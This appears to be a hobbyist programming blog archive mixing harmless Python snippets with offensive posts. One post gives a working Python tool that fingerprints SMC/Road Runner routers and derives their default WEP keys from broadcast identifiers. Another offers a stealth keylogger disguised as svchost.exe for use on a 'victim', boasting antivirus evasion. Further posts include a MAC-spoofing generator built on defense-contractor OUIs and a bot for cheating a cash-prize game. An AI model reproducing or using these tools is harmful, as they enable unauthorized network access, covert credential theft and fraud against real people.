Monday, June 25, 2012

Python: Glide, instead of move, mouse cursor from one point to another

I couldn't find a function in pywin32 to smoothly glide a pointer from one point to another, instead of simply "moving" the cursor by making it jump from its current position to a given position.  I needed a way to make the mouse sort of "glide" from point A to point B at a seemingly natural pace, so here's my solution:

import time
import win32api

MOUSE_SPEED = .4      # seconds a full glide takes
MOUSE_INTERVALS = 40  # number of steps a glide is split into

def mouse_glide_to(x, y):
    """Smoothly glides the mouse from its current position to point x,y
    with the default timing and step count"""
    x1, y1 = win32api.GetCursorPos()
    smooth_glide_mouse(x1, y1, x, y, MOUSE_SPEED, MOUSE_INTERVALS)

def smooth_glide_mouse(x1, y1, x2, y2, t, intervals):
    """Smoothly glides the mouse from x1,y1 to x2,y2 in time t using
    intervals amount of steps"""
    distance_x = x2 - x1
    distance_y = y2 - y1
    for n in range(0, intervals + 1):
        # Use float math so the steps are evenly spaced (integer division would
        # stop short of the target); SetCursorPos only accepts integer coordinates
        move_mouse(int(x1 + n * (distance_x / float(intervals))),
                   int(y1 + n * (distance_y / float(intervals))))
        time.sleep(t * 1.0 / intervals)

def move_mouse(x, y):
    win32api.SetCursorPos((x, y))

mouse_glide_to(x,y) will move the cursor from its current position to point (x,y) in MOUSE_SPEED seconds. It works perfectly!

Saturday, June 23, 2012

Road Runner (SMC Networks) routers - practically NO security

Upon registering for Time Warner's Road Runner internet service, customers are offered a router manufactured by SMC Networks.  The router ships with WEP encryption enabled by default, using a 128-bit key (a 104-bit secret plus the 24-bit IV) derived from its MAC address.  WEP is already the weakest form of wireless encryption still in use, and SMC Networks makes it worse by not generating a random WEP key; home users almost never change the default key unless forced to during first-time installation, either because they are unaware of the risks of a vulnerable network or because they don't know how, or don't care enough, to change it.  A randomly generated WEP key can be cracked just as easily as any other, but the default key on these routers is worse than that: it can be derived from information that shows up in an ordinary AP (Access Point) scan of the area.

The encryption key can be discovered in seconds, without the need for conventional wireless cracking tools such as the aircrack-ng suite. These routers effectively have no security whatsoever, as even the most tech-challenged of computer users can break into them.  From there, the users of the network are vulnerable to all kinds of harm, ranging from innocent piggy-backing to malware and identity theft.



In under a minute, one can find the key using only the router's wireless network name (SSID) and its wireless MAC address (BSSID).  These routers stick out like a sore thumb because their SSIDs are simply 4 hex characters (e.g. 'D78A') and their MAC addresses typically begin with 00:26:F3, 00:22:2D, or 78:CD:8E (OUI). 


Here's how:

In this example, let's assume we see a router whose SSID is '4B5F' and whose wireless MAC address is 00:26:F3:73:4B:52. The WEP key is generated in this format:

[first 10 characters of MAC] + [last two characters of SSID] + 14 0's

Following this format, we take the first 10 hex digits (the first 5 octets) of the MAC address, which any everyday wireless scan in Windows or OS X shows: "00:26:F3:73:4B", append the last two digits of the SSID: "5F", and tack on 14 0's to form the router's 26-hex-digit WEP key (the 104-bit secret of a "128-bit" WEP key):

00:26:F3:73:4B:5F:00:00:00:00:00:00:00
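The recipe above, as an added example that is not code from the original post: a Python 3 script that takes a BSSID and SSID from a scan result, first checks the two fingerprints the post gives (a four-hex-character SSID and one of the SMC OUIs listed above), then reconstructs the factory key. The OUI list is copied from this post and is assumed to be incomplete; the scan result at the bottom is constructed to match the post's worked example.

```python
import re

# OUIs the post reports on these Road Runner/SMC routers (assumption: taken
# from the post, not an exhaustive list)
SMC_ROADRUNNER_OUIS = {"0026F3", "00222D", "78CD8E"}


def normalize_hex(s):
    """Strip separators and upper-case a MAC/SSID string: '00:26:f3' -> '0026F3'."""
    return re.sub(r"[^0-9A-Fa-f]", "", s).upper()


def looks_like_roadrunner_ap(bssid, ssid):
    """Fingerprint from the post: SSID is exactly four hex characters and the
    BSSID's OUI is one of the SMC ranges seen on these routers."""
    mac = normalize_hex(bssid)
    return (len(mac) == 12
            and mac[:6] in SMC_ROADRUNNER_OUIS
            and re.fullmatch(r"[0-9A-Fa-f]{4}", ssid) is not None)


def default_wep_key(bssid, ssid):
    """Factory WEP key: first 5 octets of the BSSID, last two SSID characters,
    then 14 zero nibbles. 26 hex digits = the 104-bit secret of a WEP-128 key
    (the remaining 24 bits are the per-packet IV, not part of the key)."""
    mac = normalize_hex(bssid)
    if len(mac) != 12:
        raise ValueError("BSSID must be 6 octets: %r" % bssid)
    if re.fullmatch(r"[0-9A-Fa-f]{4}", ssid) is None:
        raise ValueError("SSID must be 4 hex characters: %r" % ssid)
    key = mac[:10] + ssid.upper()[-2:] + "0" * 14
    assert len(key) == 26
    return key


def colon_format(hexkey):
    """'0026F3...' -> '00:26:F3:...' for pasting into a client's WEP key field."""
    return ":".join(hexkey[i:i + 2] for i in range(0, len(hexkey), 2))


if __name__ == "__main__":
    # Constructed scan result matching the post's example
    bssid, ssid = "00:26:F3:73:4B:52", "4B5F"
    if looks_like_roadrunner_ap(bssid, ssid):
        print(colon_format(default_wep_key(bssid, ssid)))
```

Everything the function needs is broadcast in the AP's beacons, which is the whole problem: the "secret" is a function of public identifiers, so the encryption adds nothing even before the well-known weaknesses of WEP itself come into play.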

Knowing this, any joe-shmo can "hack" into a Road Runner SMC Networks router with just a smartphone and, optionally, a pen and paper.  I would highly recommend that either SMC Networks or Road Runner move on to WPA2 encryption in their new routers and attempt to update these routers to use WPA2.  New Verizon FiOS Actiontec routers come factory default with WPA2 enabled with a randomly generated 32-character string and WPS disabled; they could learn something from Verizon!


EDIT: Apparently, the insecurity of these routers was already covered in an article from 2009; it's sad to see nothing has been done about it since then!  
"However, the Time Warner devices come pre-configured and locked, with URL blocking being the only feature available to the customer through the web administration interface."
According to the article, the router's web administration is locked and the home user cannot change the encryption scheme nor the encryption key, even if he or she wanted to.  This is definitely a huge issue.  

Python: Calculating the average color of an area of an image (PIL)

Here's a snippet of code I whipped up in Python to calculate the average color of a square-shaped area of an image.  I used the Python Imaging Library (PIL) to load the image, so be sure to have it available if you're using this.

import Image  # old-style PIL import; with Pillow use: from PIL import Image

def get_average_color((x, y), n, image):  # tuple parameter: Python 2 syntax
    """ Returns a 3-tuple containing the RGB value of the average color of the
    given square bounded area of length = n whose origin (top left corner)
    is (x, y) in the given image"""

    r, g, b = 0, 0, 0
    count = 0
    for s in range(x, x + n):        # n pixels across ...
        for t in range(y, y + n):    # ... and n pixels down
            pixlr, pixlg, pixlb = image[s, t]
            r += pixlr
            g += pixlg
            b += pixlb
            count += 1
    return ((r / count), (g / count), (b / count))

# convert('RGB') so every pixel is an (r, g, b) tuple, even for RGBA or palette PNGs
image = Image.open('test.png').convert('RGB').load()
r, g, b = get_average_color((24, 290), 50, image)
print r, g, b

This is great for detecting the color of an area of an animated and constantly changing game screen, where finding the color of a single pixel may not be accurate enough for your needs.

Saturday, March 31, 2012

Simple Keylogger in VB .NET


This is a basic keylogger I wrote in VB.NET a few months ago.  It can be hidden by pressing the key combination CTRL+SHIFT+S (pressing it toggles the display of the keylogger control panel), and it has an inconspicuous process name, "svchost.exe".  Upon exit, it will dump its keystroke log to C:\ntklr.sys and make the file hidden.  If you do not have permission to write to that directory, or would like to save the log using a different file name, you can select a different directory and path after checking the "Write to file?" checkbox.

This free, easy to use, and open source application does not raise any flags with popular anti-viruses as of right now, according to this report from VirusTotal, a service that scans a file through 40+ popular anti-virus products.  

To use, simply:
  1. Check the "Write to file?" checkbox and select a path (or use the default path), then click Open.
  2. Click the Start button to start keylogging.
  3. Press the key combination CTRL+SHIFT+S (all at once) to conceal the window.  ("stealth" mode)
  4. Press some keys, or wait for the victim to type something.
  5. Whenever you want, hit CTRL+SHIFT+S again to bring the window back and view the log.  Exit the application or hit End to make it write the log to the log file you specified.  
  6. Open the logfile to view keystrokes.  This file is hidden, so make sure you have Show hidden files enabled in Windows Explorer to find it.

[Screenshots: victim logs in; credentials captured ;)]
If you would like to improve or modify this application, feel free to use the provided source code!  It requires the .NET Framework 4.0 redistributable package to be installed in order to run.
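The two tricks this keylogger relies on (a process named svchost.exe and a hidden log at C:\ntklr.sys) are also exactly what a defender would look for. As an added example, not part of the original post or its source, here is a Python 3 check for both indicators. The file path, the Windows install root and the assumption that wmic is available (it has been deprecated in recent Windows releases) are all assumptions; the process list at the bottom is a constructed sample so the logic can be run anywhere.

```python
import os
import stat

# Indicators taken from the post (assumption: defaults, the log path is configurable)
LOG_FILE = r"C:\ntklr.sys"
SYSTEM_ROOT = r"C:\Windows"   # assumption: default install drive and directory


def _norm(path):
    """Normalise a Windows path for comparison: drop quotes, unify slashes, lower-case."""
    return path.strip().strip('"').replace("/", "\\").lower()


def is_legit_svchost_path(path, system_root=SYSTEM_ROOT):
    """The real svchost.exe lives only in System32 (or SysWOW64 on 64-bit
    Windows); anything else using that name is worth a look."""
    legit = {_norm(os.path.join(system_root, sub, "svchost.exe"))
             for sub in ("System32", "SysWOW64")}
    return _norm(path) in legit


def suspicious_svchost(processes, system_root=SYSTEM_ROOT):
    """processes: iterable of (image name, executable path). Returns the paths
    of svchost.exe instances running from outside the Windows directory."""
    return [path for name, path in processes
            if name.lower() == "svchost.exe"
            and not is_legit_svchost_path(path, system_root)]


def is_hidden_file(path):
    """True when the file exists and carries the hidden attribute
    (st_file_attributes is only populated on Windows; elsewhere this is False)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    attrs = getattr(st, "st_file_attributes", 0)
    return bool(attrs & stat.FILE_ATTRIBUTE_HIDDEN)


def list_processes_windows():
    """Collect (name, path) pairs from wmic's CSV output. Column order is read
    from the header row rather than assumed. Windows only; not used below."""
    import subprocess
    out = subprocess.run(
        ["wmic", "process", "get", "Name,ExecutablePath", "/format:csv"],
        capture_output=True, text=True, check=True).stdout
    rows = [line.split(",") for line in out.splitlines() if line.strip()]
    header = rows[0]
    name_i, path_i = header.index("Name"), header.index("ExecutablePath")
    return [(r[name_i], r[path_i]) for r in rows[1:]
            if len(r) > max(name_i, path_i) and r[path_i]]


# Constructed sample, not real system output
SAMPLE_PROCESSES = [
    ("svchost.exe", r"C:\Windows\System32\svchost.exe"),
    ("svchost.exe", r"C:\Windows\SysWOW64\svchost.exe"),
    ("svchost.exe", r"C:\Users\bob\Downloads\svchost.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for p in suspicious_svchost(SAMPLE_PROCESSES):
        print("svchost.exe outside the Windows directory:", p)
    print("hidden log present:", is_hidden_file(LOG_FILE))
```

On a live box, replace SAMPLE_PROCESSES with list_processes_windows(). Process name alone is a weak signal either way: the check is the path, and the hidden attribute on a file with a .sys extension outside a system directory.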

Binary (.exe): Download
.NET 4.0 redistributable package: Download
Source: GitHub repo

SomewhatSecureChat - Chat with another computer on your network!

This free, simple chat application will allow you to chat securely with another computer on your LAN (it could also work over the internet, but not without some changes to account for NAT, such as port forwarding).  It was written in VB .NET, so you'll need the .NET framework installed in order to use it.  Click here to download it.


Both parties will need to have this application running (and listening) in order to chat.   Simply agree on a mutual password and record your friend's listening port number and IP address, and you'll be chatting in no time!  Somewhat Secure Chat is only for Windows.  This easy to use application is free and open-source; feel free to improve and distribute this program!

Binary (.exe): Download
Required .NET framework 4.0 installer: Download
Source: GitHub Repo

Wednesday, October 19, 2011

Badass OUIs to use when spoofing your MAC address

When spoofing MAC addresses, I like to use OUIs from major defense companies to troll anyone that snoops around (and bothers to look it up).  Here's my list of awesome OUIs:


00-1A-11   (hex) Google Inc.
001A11     (base 16) Google Inc.
1600 Amphitheater Parkway
Mountain View CA 94043
UNITED STATES


00-00-8F   (hex) Raytheon
00008F     (base 16) Raytheon
M/S 1-1-1119
1001 Boston Post Rd
Marlboro MA 01752
UNITED STATES


00-0B-F3   (hex) BAE SYSTEMS
000BF3     (base 16) BAE SYSTEMS
6500 Tracor Lane
Austin Texas 78725
UNITED STATES


00-E0-AF   (hex) GENERAL DYNAMICS INFORMATION SYSTEMS
00E0AF     (base 16) GENERAL DYNAMICS INFORMATION SYSTEMS
COMPUTING DEVICES, LTD.
3190 FAIRVIEW PA
FALLS CHURCH VA 22042-4523
UNITED STATES


00-A0-21   (hex) General Dynamics
00A021     (base 16) General Dynamics
Communication Systems
77A Street
Needham Heights MA 02494-2892
UNITED STATES


00-26-89   (hex) General Dynamics Robotic Systems
002689     (base 16) General Dynamics Robotic Systems
1231 Tech Court
Westminster MD 21157
UNITED STATES


00-19-8A   (hex) Northrop Grumman Systems Corp.
00198A     (base 16) Northrop Grumman Systems Corp.
7055 Troy Hill Drive
Elkridge Maryland 21075
UNITED STATES


00-40-BE   (hex) BOEING DEFENSE & SPACE
0040BE     (base 16) BOEING DEFENSE & SPACE
P.O. BOX 3999
MAIL STOP 88-12
SEATTLE WA 98124-2499
UNITED STATES


60-8D-17   (hex) Sentrus Government Systems Division, Inc
608D17     (base 16) Sentrus Government Systems Division, Inc
141 Chesterfield Industrial Blvd
Chesterfield MO 63005-1219
UNITED STATES


00-07-EF   (hex) Lockheed Martin Tactical Systems
0007EF     (base 16) Lockheed Martin Tactical Systems
3333 Pilot Knob Road
Eagan MN 55121
UNITED STATES


00-08-55   (hex) NASA-Goddard Space Flight Center
000855     (base 16) NASA-Goddard Space Flight Center
Code 561
Greenbelt MD 20771
UNITED STATES


00-0E-96   (hex) Cubic Defense Applications, Inc.
000E96     (base 16) Cubic Defense Applications, Inc.
P.O. Box 85587
9333 Balboa Avenue
San Diego CA 92186-5587
UNITED STATES


00-14-8D   (hex) Cubic Defense Simulation Systems
00148D     (base 16) Cubic Defense Simulation Systems
2001 W. Oakridge Road
Orlando FL 32809
UNITED STATES


00-1F-0D   (hex) L3 Communications - Telemetry West
001F0D     (base 16) L3 Communications - Telemetry West
9020 Balboa Ave
San Diego CA 92123
UNITED STATES


EC-5C-69   (hex) MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD.
EC5C69     (base 16) MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD.
1-16,5-CHOME,KOMATSU-DORI,
KOBE HYOGO 652-0865
JAPAN


00-00-AE   (hex) DASSAULT ELECTRONIQUE
0000AE     (base 16) DASSAULT ELECTRONIQUE
55, QUAI MARCEL DASSAULT
92214 ST CLOUD
FRANCE


00-00-AF   (hex) NUCLEAR DATA INSTRUMENTATION
0000AF     (base 16) NUCLEAR DATA INSTRUMENTATION
GOLF & MEACHAM ROADS
SCHAUMBERG IL 60196
UNITED STATES
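As an added example that is not part of the original post: a Python 3 helper that builds a random station address under one of the OUIs listed above and checks that the result still looks vendor-assigned. The vendor table is copied from the list in this post (names as the registry entries give them); nothing here talks to a network interface, so applying the address is left to ifconfig/ip link or your driver's tool.

```python
import random
import re

# OUIs from the list above (assumption: copied from the post, not from a live registry)
OUIS = {
    "001A11": "Google Inc.",
    "00008F": "Raytheon",
    "000BF3": "BAE SYSTEMS",
    "00E0AF": "GENERAL DYNAMICS INFORMATION SYSTEMS",
    "00A021": "General Dynamics",
    "002689": "General Dynamics Robotic Systems",
    "00198A": "Northrop Grumman Systems Corp.",
    "0040BE": "BOEING DEFENSE & SPACE",
    "608D17": "Sentrus Government Systems Division, Inc",
    "0007EF": "Lockheed Martin Tactical Systems",
    "000855": "NASA-Goddard Space Flight Center",
    "000E96": "Cubic Defense Applications, Inc.",
    "00148D": "Cubic Defense Simulation Systems",
    "001F0D": "L3 Communications - Telemetry West",
    "EC5C69": "MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD.",
    "0000AE": "DASSAULT ELECTRONIQUE",
    "0000AF": "NUCLEAR DATA INSTRUMENTATION",
}


def normalize(mac):
    """'00-1a-11' / '00:1A:11' -> '001A11'."""
    return re.sub(r"[^0-9A-Fa-f]", "", mac).upper()


def vendor_of(mac):
    """Look the first three octets up in the table; None if not on the list."""
    return OUIS.get(normalize(mac)[:6])


def is_unicast_globally_administered(mac):
    """Bit 0 of the first octet is the I/G bit (must be 0 for a station address)
    and bit 1 is the U/L bit (0 = assigned by the vendor). A spoofed address that
    keeps both clear passes as a factory-burned address from that vendor, which is
    what you want when someone bothers to look the OUI up."""
    first = int(normalize(mac)[:2], 16)
    return first & 0b11 == 0


def spoof_mac(oui, seed=None):
    """Random 48-bit address under the given OUI. seed is only for reproducible
    output in tests; leave it None for a fresh address each time."""
    oui_hex = normalize(oui)
    if len(oui_hex) != 6:
        raise ValueError("OUI must be three octets: %r" % oui)
    if not is_unicast_globally_administered(oui_hex + "000000"):
        raise ValueError("OUI %s has the multicast or local bit set" % oui_hex)
    rng = random.Random(seed)
    nic = "%06X" % rng.getrandbits(24)        # vendor-specific lower 24 bits
    mac = oui_hex + nic
    return ":".join(mac[i:i + 2] for i in range(0, 12, 2))


if __name__ == "__main__":
    mac = spoof_mac("00-1A-11")
    print(mac, "->", vendor_of(mac))
```

Keep in mind that these are globally assigned blocks, so a random lower half can in principle collide with a real device from that vendor on the same segment; the U/L-bit convention exists precisely so that locally chosen addresses (second hex digit 2, 6, A or E) never collide, at the cost of looking obviously non-factory.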

Monday, October 10, 2011

WorldWinner Big Money Bot written in Python

[Screenshot: what WW used to look like before GSN bought them.]

I generally scored between 60,000-120,000 points on WorldWinner's Big Money compete-for-cash game, which, to me, was pretty good.  That was until I decided to look up some strategies for improving my skill in BM and instead stumbled upon some YouTube videos of players scoring upwards of 350,000 points. My highest score was 137,582, and the highest I've ever seen in my experience was around 180k. You can imagine I was pretty shocked that a score higher than 200,000 was even possible, let alone achievable without cheating.


I then realized how much I suck at this game.  Well, what do you do when you can't beat a game?  Try, try again?  Practice?  Nope.  You cheat.


A simple Google search for "worldwinner big money bot" led me to one of those shady infomercial style sites with obviously fake and cheesy testimonials.  The product's slogan ended with "MAKE MORE MONEY THAN YOU COULD EVER IMAGINE!!!"  Riiiiiight.

Other than that shady site, I couldn't find any mention elsewhere of a bot for Big Money.  I decided to make my own.

It works, but it doesn't strategize, ponder, or think ahead yet; so it will usually end the game with a score between 60k - 120k.  I wrote this a while ago and I'm too busy at the moment to implement this feature.  If anybody would like to improve upon this, feel free.  Be warned, however: I didn't think I'd be sharing this so it's poorly commented.

To start, simply download the script here.  It was written for the latest version of Python 2, but any version > 2.5 should work fine IIRC.  It requires the Python Imaging Library (PIL) and Python for Windows Extensions (pywin32).


Before you can run it, you'll need to modify the script to set some variables.  You'll need to change variables 'xbeg' and 'ybeg' to fit your resolution and browser.  You can take a screenshot and measure the distance in MS Paint.  Use the picture below as a guide.


Here's a video of the bot in action: